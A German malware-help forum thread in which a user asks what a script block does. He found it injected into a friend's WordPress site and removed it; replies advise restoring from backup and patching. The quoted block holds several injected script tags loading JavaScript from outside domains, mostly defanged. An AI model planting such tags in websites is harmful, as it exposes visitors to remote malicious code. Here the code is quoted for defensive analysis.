Zurück   Trojaner-Board > Malware entfernen > Diskussionsforum

Diskussionsforum: Script Code auf eigener Webseite gefunden

Windows 7 Hier sind ausschließlich fachspezifische Diskussionen erwünscht. Bitte keine Log-Files, Hilferufe oder ähnliches posten. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Bereinigungen von nicht ausgebildeten Usern sind hier untersagt. Wenn du dir einen Virus doer Trojaner eingefangen hast, eröffne ein Thema in den Bereinigungsforen oben.

Antwort
Alt 21.05.2020, 17:53   #1
dermikey
 
Script Code auf eigener Webseite gefunden - Standard

Script Code auf eigener Webseite gefunden



Liebe Leute,

ich bin froh, lange nicht mehr hier gewesen zu sein. Lange nichts eingefangen

Heute wurde ich von einem Bekannten angeschrieben, dessen Wordpress-Webseite ich vor langer Zeit aufgesetzt habe.

Sein Kaspersky würde neuerdings anschlagen, wenn er seine Webseite besucht.
Komisch, Windows Defender, Chrome und Avira bleiben bei mir ruhig.

Aber tatsächlich, in zwei Unterseiten fand ich ein Script, was dort nichts verloren hat.
Script entfernt, Kaspersky ruhig.

Frage jetzt: Kann ich mir was eingefangen haben? Scann mit Malewarebytes brachte keinen Fund.

Vielleicht ist ja hier jemand, der sich mit Scripten und HTML auskennt. Folgendes Script habe ich vorgefunden und entfernt.
Was macht es und hat es bei mir als Endanwender/Webseitenbesucher etwas ausgelöst?

Zitat:
<p><script src="//permissnew.com/1cbabfaba9fb0d03cc.js"></script><script src="hxxp://permissnew.com/optout/set/lat?jsonp=__twb_cb_168411711&amp;key=1cbabfaba9fb0d03cc&amp;cv=1535615818&amp;t=1535615818018" type="text/javascript"></script><script src="hxxp://permissnew.com/optout/set/lt?jsonp=__twb_cb_22600740&amp;key=1cbabfaba9fb0d03cc&amp;cv=197950&amp;t=1535615818022" type="text/javascript"></script><script src="hxxp://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52295x7354x&amp;r=1535615818037" type="text/javascript"></script><script src="hxxp://permissnew.com/ext/1cbabfaba9fb0d03cc.js?sid=52295_7354_&amp;title=FF_%5B601%5D_missionewapp.cool&amp;blocks[]=31af2" type="text/javascript"></script></p>


Alt 21.05.2020, 19:31   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Script Code auf eigener Webseite gefunden - Standard

Script Code auf eigener Webseite gefunden



Setz deinen Webserver zurück vom letzen Backup. Und ihr müsst zusehen, dass immer die aktuelle Wordpressversion drin ist.^
__________________

__________________

Alt 21.05.2020, 20:02   #3
dermikey
 
Script Code auf eigener Webseite gefunden - Standard

Script Code auf eigener Webseite gefunden



Zitat:
Zitat von cosinus Beitrag anzeigen
Setz deinen Webserver zurück vom letzen Backup. Und ihr müsst zusehen, dass immer die aktuelle Wordpressversion drin ist.^
Webseite ist wieder sauber. Wordpress immer aktuell.
Frage ist jetzt: Kann mir das Script etwas angehabt haben?
Die üblichen Scans sehen sauber aus. Ich kann aber keine Script-Befehle lesen. Was macht das Ding?
__________________

Alt 21.05.2020, 22:38   #4
stefanbecker
 
Script Code auf eigener Webseite gefunden - Standard

Script Code auf eigener Webseite gefunden



Falsche Frage. Über welche Sicherheitslücke kam der Angreifer auf die Maschine?

Alt 21.05.2020, 22:54   #5
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Script Code auf eigener Webseite gefunden - Standard

Script Code auf eigener Webseite gefunden



Zitat:
Zitat von stefanbecker Beitrag anzeigen
Falsche Frage. Über welche Sicherheitslücke kam der Angreifer auf die Maschine?
Warum. Die haben doch auf irgeneinem Rechner Kaspersky oder AVG. Und deswegen wollte der Chef keine weiteren IT-Fuzzies.

__________________
"Die Wahrheit ist normalerweise nur eine Entschuldigung für einen Mangel an Fantasie." (Elim Garak)

Wie man Programme richtig installiert

Backup mit DriveSnapshot

Das TB unterstützen

Antwort

Themen zu Script Code auf eigener Webseite gefunden
avira, besuch, besucher, bleibe, code, defender, eigener, eingefangen, entfernt, folge, folgendes, gen, html, kaspersky, lange, langer, leute, nicht mehr, nichts, scan, script, scripte, verloren, webseite, windows



Ähnliche Themen: Script Code auf eigener Webseite gefunden


  1. HEUR:Trojan.Script.Generic (durch Kaspersky gefunden) | Windows 8.1 | Firefox
    Log-Analyse und Auswertung - 11.01.2018 (7)
  2. gefunden: Heur:Trojan.script.generic
    Plagegeister aller Art und deren Bekämpfung - 08.12.2017 (20)
  3. Verwirrung bei X:\ProgramData\Key-Base\05202499.051\CODE.PKD/CODE.PK_
    Diskussionsforum - 25.02.2017 (3)
  4. Bösartiger Code in Datei C:\Windows\Temp\WAX3AC2.tmp gefunden Infektion:Gen:Trojan.Heur.FU.UuZ@aCpc0Se
    Log-Analyse und Auswertung - 08.07.2016 (31)
  5. win32.Trojan-spy.VIS.A, Script. Trojan-Spy.VIS.B (engineB) - Bankpassworttrojaner gefunden!
    Plagegeister aller Art und deren Bekämpfung - 31.03.2014 (19)
  6. Systemdatum verstellt - "HEUR:Trojan.Script.Iframer" mit desinfec't gefunden
    Log-Analyse und Auswertung - 06.01.2014 (21)
  7. HEUR:Trojan.Script.Generic auf meiner Webseite
    Plagegeister aller Art und deren Bekämpfung - 06.01.2014 (1)
  8. Fremdes Script auf der Webseite
    Plagegeister aller Art und deren Bekämpfung - 16.11.2012 (0)
  9. Live Security Platinum auf eigener Webseite und Festplatte
    Plagegeister aller Art und deren Bekämpfung - 08.08.2012 (24)
  10. Phishing / Trojaner? c1x4v4.php auf Joomla Webseite gefunden
    Plagegeister aller Art und deren Bekämpfung - 25.04.2012 (0)
  11. FTP Daten durch Trojaner ausgesät? Webseite wurde per FTP mit Code infiziert!
    Log-Analyse und Auswertung - 20.04.2012 (4)
  12. Bösartiger Code gefunden / Blue Screen
    Plagegeister aller Art und deren Bekämpfung - 15.04.2011 (8)
  13. Schädlicher Code auf eigener Homepage
    Plagegeister aller Art und deren Bekämpfung - 20.12.2010 (0)
  14. Code anderer Hersteller oftmals Ursache für Lücken in eigener Software
    Nachrichten - 23.09.2010 (0)
  15. VBS-Script file gefunden
    Plagegeister aller Art und deren Bekämpfung - 26.06.2009 (7)

Zum Thema Script Code auf eigener Webseite gefunden - Liebe Leute, ich bin froh, lange nicht mehr hier gewesen zu sein. Lange nichts eingefangen Heute wurde ich von einem Bekannten angeschrieben, dessen Wordpress-Webseite ich vor langer Zeit aufgesetzt habe. - Script Code auf eigener Webseite gefunden...
Archiv
Du betrachtest: Script Code auf eigener Webseite gefunden auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.